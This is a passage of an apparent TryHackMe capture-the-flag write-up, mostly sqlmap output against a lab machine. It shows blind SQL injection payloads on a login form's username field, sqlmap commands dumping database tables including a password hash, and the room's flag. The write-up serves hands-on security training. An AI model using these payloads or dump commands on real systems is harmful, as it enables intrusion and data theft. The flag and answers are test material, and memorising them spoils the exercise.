```
[02:07:35] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 325 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=DesKel' AND 7770=7770 AND 'RCyk'='RCyk&password=asd&submit=submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=DesKel' AND (SELECT 4294 FROM (SELECT(SLEEP(5)))aNXd) AND 'IOHp'='IOHp&password=asd&submit=submit
---
[02:07:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[02:07:52] [INFO] fetched data logged to text files under '/home/mayomacam/.sqlmap/output/10.10.161.234'

[*] ending @ 02:07:52 /2021-01-08/
```

we got successful sqli...

let's retrive database
```
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] THM_f0und_m3

```

================================================================================
table mysql:

```
Database: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+
```

┌─[✗]─[mayomacam@parrot]─[~/tryhackme/ctf-collection-2.0]
└──╼ $sqlmap -r sqli.req -D THM_f0und_m3 -T user --dump --threads 10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.12#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:08:48 /2021-01-08/

[03:08:48] [INFO] parsing HTTP request from 'sqli.req'
[03:08:48] [INFO] resuming back-end DBMS 'mysql' 
[03:08:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=DesKel' AND 7770=7770 AND 'RCyk'='RCyk&password=asd&submit=submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=DesKel' AND (SELECT 4294 FROM (SELECT(SLEEP(5)))aNXd) AND 'IOHp'='IOHp&password=asd&submit=submit
---
[03:08:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[03:08:48] [INFO] fetching columns for table 'user' in database 'THM_f0und_m3'
[03:08:48] [INFO] resumed: 2
[03:08:48] [INFO] retrieving the length of query output
[03:08:48] [INFO] resumed: 8
[03:08:48] [INFO] resumed: username
[03:08:48] [INFO] retrieving the length of query output
[03:08:48] [INFO] resumed: 8
[03:08:48] [INFO] resumed: password
[03:08:48] [INFO] fetching entries for table 'user' in database 'THM_f0und_m3'
[03:08:48] [INFO] fetching number of entries for table 'user' in database 'THM_f0und_m3'
[03:08:48] [INFO] resumed: 2
[03:08:48] [INFO] retrieving the length of query output
[03:08:48] [INFO] resumed: 32
[03:08:48] [INFO] resumed: 05f3672ba34409136aa71b8d00070d1b
[03:08:48] [INFO] retrieving the length of query output
[03:08:48] [INFO] resumed: 6
[03:08:48] [INFO] resumed: DesKel
[03:08:48] [INFO] retrieving the length of query output
[03:08:48] [INFO] resumed: 34
[03:08:48] [INFO] resumed: He is a nice guy, say hello for me
[03:08:48] [INFO] retrieving the length of query output
[03:08:48] [INFO] resumed: 5
[03:08:48] [INFO] resumed: Skidy
[03:08:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[03:08:54] [INFO] writing hashes to a temporary file '/tmp/sqlmaps6fsbefk118833/sqlmaphashes-pyiqyih3.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: THM_f0und_m3
Table: user
[2 entries]
+------------------------------------+----------+
| password                           | username |
+------------------------------------+----------+
| 05f3672ba34409136aa71b8d00070d1b   | DesKel   |
| He is a nice guy, say hello for me | Skidy    |
+------------------------------------+----------+

[03:08:58] [INFO] table 'THM_f0und_m3.`user`' dumped to CSV file '/home/mayomacam/.sqlmap/output/10.10.161.234/dump/THM_f0und_m3/user.csv'
[03:08:58] [INFO] fetched data logged to text files under '/home/mayomacam/.sqlmap/output/10.10.161.234'

[*] ending @ 03:08:58 /2021-01-08/

┌─[mayomacam@parrot]─[~/tryhackme/ctf-collection-2.0]
└──╼ $sqlmap -r sqli.req -D THM_f0und_m3 -T nothing_inside --dump --threads 10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.12#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:09:47 /2021-01-08/

[03:09:47] [INFO] parsing HTTP request from 'sqli.req'
[03:09:47] [INFO] resuming back-end DBMS 'mysql' 
[03:09:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=DesKel' AND 7770=7770 AND 'RCyk'='RCyk&password=asd&submit=submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=DesKel' AND (SELECT 4294 FROM (SELECT(SLEEP(5)))aNXd) AND 'IOHp'='IOHp&password=asd&submit=submit
---
[03:09:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[03:09:48] [INFO] fetching columns for table 'nothing_inside' in database 'THM_f0und_m3'
[03:09:48] [INFO] retrieved: 1
[03:09:49] [INFO] retrieving the length of query output
[03:09:49] [INFO] retrieved: 8
[03:09:54] [INFO] retrieved: Easter_4           
[03:09:54] [INFO] fetching entries for table 'nothing_inside' in database 'THM_f0und_m3'
[03:09:54] [INFO] fetching number of entries for table 'nothing_inside' in database 'THM_f0und_m3'
[03:09:54] [INFO] retrieved: 1
[03:09:56] [INFO] retrieving the length of query output
[03:09:56] [INFO] retrieved: 23
[03:10:07] [INFO] retrieved: THM{1nj3c7_l1k3_4_b055}             
Database: THM_f0und_m3
Table: nothing_inside
[1 entry]
+-------------------------+
| Easter_4                |
+-------------------------+
| THM{1nj3c7_l1k3_4_b055} |
+-------------------------+

[03:10:07] [INFO] table 'THM_f0und_m3.nothing_inside' dumped to CSV file '/home/mayomacam/.sqlmap/output/10.10.161.234/dump/THM_f0und_m3/nothing_inside.csv'
[03:10:07] [INFO] fetched data logged to text files under '/home/mayomacam/.sqlmap/output/10.10.161.234'

[*] ending @ 03:10:07 /2021-01-08/


